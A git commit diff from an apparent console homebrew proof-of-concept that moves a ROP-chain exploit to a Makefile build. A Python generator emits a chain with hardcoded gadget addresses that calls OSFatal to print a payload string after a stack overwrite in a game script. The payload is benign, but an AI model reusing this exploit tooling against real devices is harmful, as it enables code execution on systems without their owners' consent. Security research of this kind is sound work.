Move PoC to new build system

2024-12-05 00:04:18 +01:00 · 2019-01-18 16:51:28 -05:00 · 2019-01-18 16:51:28 -05:00 · e55751d908
commit e55751d908
parent 4430db9de0
9 changed files with 98 additions and 162 deletions
--- a/kexploit/generate_rop.py
+++ b/kexploit/generate_rop.py
@ -16,7 +16,7 @@ def writeEnd():
    script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend"
 """
-Example payload
+Example payload (writeOSFatalPayload func)
 pushInt. 0xC00C650
 pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal)
@ -50,6 +50,7 @@ pushInt. 0x01031618 #return address (OSFatal)
 """
 # Print out contents of payload as null terminated string
 def writeOSFatalPayload():
    write32(LOAD_R3_ADDR)
    writePayloadAddress()
@ -63,7 +64,9 @@ def main():
    global script
    with open('rop_setup.s', 'r') as f:
        script = f.read()
    writeOSFatalPayload()
    with open("main.s", 'w') as f:
        f.write(script)
--- a/poc/Makefile
+++ b/poc/Makefile
@ -0,0 +1,14 @@
 all: exploit.mscsb
 clean:
 	rm -f exploit.mscsb payload.s main.s
 exploit.mscsb: payload.s Scripts main.s
 	python3 ../pymsc/asm.py
 payload.s: payload.bin
 	python3 generate_payload.py
 main.s: rop_setup.s
 	python3 generate_rop.py
--- a/poc/Scripts
+++ b/poc/Scripts
@ -1,3 +1,3 @@
-:script_0.txt
+:main.s
-string.txt
+payload.s
-|mario.mscsb
+|exploit.mscsb
--- a/poc/generate_payload.py
+++ b/poc/generate_payload.py
@ -1,4 +1,4 @@
-with open('string.bin', 'rb') as stringFile:
+with open('payload.bin', 'rb') as stringFile:
-    with open('string.txt', 'w') as f:
+    with open('payload.s', 'w') as f:
        for byte in stringFile.read():
            print('byte %s' % hex(byte), file=f)
--- a/poc/generate_rop.py
+++ b/poc/generate_rop.py
@ -0,0 +1,74 @@
 # Addresses
 LOAD_R3_ADDR = 0x0C00C650
 OSFATAL_ADDR = 0x01031618
 def write32(u32):
    global script
    script += f"pushInt. {hex(u32)}\n"
 def writePayloadAddress():
    global script
    script += "pushVar. globalVar,mscScriptAddress\n"
 def writeEnd():
    global script
    script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend"
 """
 Example payload (writeOSFatalPayload func)
 pushInt. 0xC00C650
 pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal)
 pushInt. 0xBEEF0001
 pushInt. 0xBEEF0002
 pushInt. 0xBEEF0003
 pushInt. 0xBEEF0004
 pushInt. 0xBEEF0005
 pushInt. 0xBEEF0006
 pushInt. 0xBEEF0007
 pushInt. 0xBEEF0008
 pushInt. 0xBEEF0009
 pushInt. 0xBEEF000A
 pushInt. 0xBEEF000B
 pushInt. 0xBEEF000C
 pushInt. 0xBEEF000D
 pushInt. 0xBEEF000E
 pushInt. 0xBEEF000F
 pushInt. 0xBEEF0010
 pushInt. 0xBEEF0011
 pushInt. 0xBEEF0012
 pushInt. 0xBEEF0013
 pushInt. 0xBEEF0014
 pushInt. 0xBEEF0015
 pushInt. 0xBEEF0016
 pushInt. 0xBEEF0017
 pushInt. 0xBEEF0018
 pushInt. 0xBEEF0019
 pushInt. 0xBEEF001A
 pushInt. 0x01031618 #return address (OSFatal)
 """
 # Print out contents of payload as null terminated string
 def writeOSFatalPayload():
    write32(LOAD_R3_ADDR)
    writePayloadAddress()
    for i in range(0x1A):
        write32(0xBEEF0000 + i + 1)
    write32(OSFATAL_ADDR)
    writeEnd()
 def main():
    global script
    with open('rop_setup.s', 'r') as f:
        script = f.read()
    writeOSFatalPayload()
    with open("main.s", 'w') as f:
        f.write(script)
 if __name__ == "__main__":
    main()
--- a/poc/mario.mscsb
+++ b/poc/mario.mscsb
--- a/poc/payload.bin
+++ b/poc/payload.bin
--- a/poc/script_0.txt
+++ b/poc/script_0.txt
@ -758,39 +758,4 @@ pushShort. 0x80
 #Now we can overwrite the stack position with the one we calculated earlier to jump to the write position
 pushVar. globalVar,calculatedStackPosition
-#Write ROP chain
+#Write ROP Chain
 pushInt. 0xC00C650
 pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal)
 pushInt. 0xBEEF0001
 pushInt. 0xBEEF0002
 pushInt. 0xBEEF0003
 pushInt. 0xBEEF0004
 pushInt. 0xBEEF0005
 pushInt. 0xBEEF0006
 pushInt. 0xBEEF0007
 pushInt. 0xBEEF0008
 pushInt. 0xBEEF0009
 pushInt. 0xBEEF000A
 pushInt. 0xBEEF000B
 pushInt. 0xBEEF000C
 pushInt. 0xBEEF000D
 pushInt. 0xBEEF000E
 pushInt. 0xBEEF000F
 pushInt. 0xBEEF0010
 pushInt. 0xBEEF0011
 pushInt. 0xBEEF0012
 pushInt. 0xBEEF0013
 pushInt. 0xBEEF0014
 pushInt. 0xBEEF0015
 pushInt. 0xBEEF0016
 pushInt. 0xBEEF0017
 pushInt. 0xBEEF0018
 pushInt. 0xBEEF0019
 pushInt. 0xBEEF001A
 pushInt. 0x01031618 #return address (OSFatal)
 #Execute ROP chain
 exit
 #Dunno why but I figured I might as well put it here, should never hit this though
 end
--- a/poc/string.txt
+++ b/poc/string.txt
@ -1,120 +0,0 @@
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x5f
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x5f
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0xa
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x7c
 byte 0x20
 byte 0x7c
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x7c
 byte 0x20
 byte 0x7c
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0x20
 byte 0xa
 byte 0x20
 byte 0x20
 byte 0x5f
 byte 0x5f
 byte 0x7c
 byte 0x20
 byte 0x7c
 byte 0x20
 byte 0x5f
 byte 0x5f
 byte 0x20
 byte 0x5f
 byte 0x7c
 byte 0x20
 byte 0x7c
 byte 0x5f
 byte 0x5f
 byte 0x20
 byte 0x20
 byte 0xa
 byte 0x20
 byte 0x2f
 byte 0x20
 byte 0x5f
 byte 0x60
 byte 0x20
 byte 0x7c
 byte 0x2f
 byte 0x20
 byte 0x5f
 byte 0x60
 byte 0x20
 byte 0x7c
 byte 0x20
 byte 0x27
 byte 0x5f
 byte 0x20
 byte 0x5c
 byte 0x20
 byte 0xa
 byte 0x7c
 byte 0x20
 byte 0x28
 byte 0x5f
 byte 0x7c
 byte 0x20
 byte 0x7c
 byte 0x20
 byte 0x28
 byte 0x5f
 byte 0x7c
 byte 0x20
 byte 0x7c
 byte 0x20
 byte 0x7c
 byte 0x5f
 byte 0x29
 byte 0x20
 byte 0x7c
 byte 0xa
 byte 0x20
 byte 0x5c
 byte 0x5f
 byte 0x5f
 byte 0x2c
 byte 0x5f
 byte 0x7c
 byte 0x5c
 byte 0x5f
 byte 0x5f
 byte 0x2c
 byte 0x5f
 byte 0x7c
 byte 0x5f
 byte 0x2e
 byte 0x5f
 byte 0x5f
 byte 0x2f
 byte 0x20
 byte 0x0